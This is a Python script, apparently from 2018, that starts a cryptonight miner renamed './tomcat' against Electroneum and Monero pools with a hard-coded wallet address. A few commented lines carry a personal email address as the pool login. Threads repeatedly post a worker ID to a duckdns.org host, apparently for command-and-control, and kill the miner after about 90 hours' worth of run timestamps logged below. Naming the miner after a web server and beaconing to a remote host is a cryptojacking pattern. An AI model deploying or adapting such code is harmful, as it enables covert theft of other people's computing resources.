import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:15:08.543818
#2018-02-17 16:03:07.118595
#2018-02-17 17:51:05.484257
#2018-02-17 19:38:02.080462
#2018-02-17 21:25:08.287166
#2018-02-17 23:09:06.514426
#2018-02-18 00:56:01.999054
#2018-02-18 02:44:05.455479
#2018-02-18 04:33:01.270656
#2018-02-18 06:24:08.324502
#2018-02-18 08:14:01.809195
#2018-02-18 10:02:06.992342
#2018-02-18 11:48:03.610459
#2018-02-18 13:33:02.033712
#2018-02-18 15:23:05.469256
#2018-02-18 17:11:07.306471
#2018-02-18 18:59:01.900058
#2018-02-18 20:46:04.582542
#2018-02-18 22:32:06.186629
#2018-02-19 00:20:03.838191
#2018-02-19 02:06:06.456150
#2018-02-19 03:53:05.958333
#2018-02-19 05:39:01.948320
#2018-02-19 07:27:01.416040
#2018-02-19 09:16:07.793968
#2018-02-19 11:07:06.534194
#2018-02-19 12:55:06.900354
#2018-02-19 14:42:08.837630
#2018-02-19 16:31:06.821021
#2018-02-19 18:17:08.174237
#2018-02-19 20:04:07.200490
#2018-02-19 21:54:07.597383
#2018-02-19 23:40:07.950365
#2018-02-20 01:26:04.886164
#2018-02-20 03:15:08.041113
#2018-02-20 05:03:07.600912
#2018-02-20 06:45:06.676206
#2018-02-20 08:31:01.777428
#2018-02-20 10:15:04.119571
#2018-02-20 12:01:10.959744
#2018-02-20 13:48:08.263969
#2018-02-20 15:33:01.335513
#2018-02-20 17:19:04.477947
#2018-02-20 19:09:08.756334
#2018-02-20 20:59:04.354955
#2018-02-20 22:44:04.964053
#2018-02-21 00:27:01.264274
#2018-02-21 02:13:05.881283
#2018-02-21 03:59:07.570481
#2018-02-21 05:46:05.385396
#2018-02-21 07:34:08.715826
#2018-02-21 09:18:06.086288
#2018-02-21 11:07:01.444191
#2018-02-21 12:54:09.210073
#2018-02-21 14:41:06.058902
#2018-02-21 16:28:02.194279
#2018-02-21 18:19:02.208758
#2018-02-21 20:04:05.127363
#2018-02-21 21:53:05.144962
#2018-02-21 23:39:08.390895
#2018-02-22 01:29:05.149255
#2018-02-22 03:17:07.348017
#2018-02-22 05:04:06.976722
#2018-02-22 06:47:06.204553
#2018-02-22 08:35:06.873759
#2018-02-22 10:22:04.866498
#2018-02-22 12:08:07.064969
#2018-02-22 13:53:11.093141
#2018-02-22 15:41:01.962832
#2018-02-22 17:28:05.914194
#2018-02-22 19:15:07.666896
#2018-02-22 21:06:06.833660
#2018-02-22 22:52:07.712890
#2018-02-23 00:40:11.224873
#2018-02-23 02:26:01.323344
#2018-02-23 04:15:03.922558
#2018-02-23 06:02:01.884134
#2018-02-23 07:48:08.212049
#2018-02-23 10:12:08.267094
#2018-02-23 12:05:06.114853
#2018-02-23 13:53:09.985189
#2018-02-23 15:45:08.697768
#2018-02-23 17:31:08.427187
#2018-02-23 19:20:01.620296
#2018-02-23 21:05:07.806125
#2018-02-23 22:50:08.806696
#2018-02-24 00:40:05.496569
#2018-02-24 02:29:07.337085
#2018-02-24 05:13:05.985389
#2018-02-24 07:01:06.300085
#2018-02-24 08:34:01.386106
#2018-02-24 10:11:04.736331
#2018-02-24 11:56:07.494021
#2018-02-24 13:22:06.700378
#2018-02-24 14:55:07.640174
#2018-02-24 16:31:05.623457
#2018-02-24 18:06:04.986050
#2018-02-24 19:33:06.233796
#2018-02-24 22:23:05.914549
#2018-02-25 02:32:01.789889
#2018-02-25 06:12:05.639419
#2018-02-25 11:40:04.786940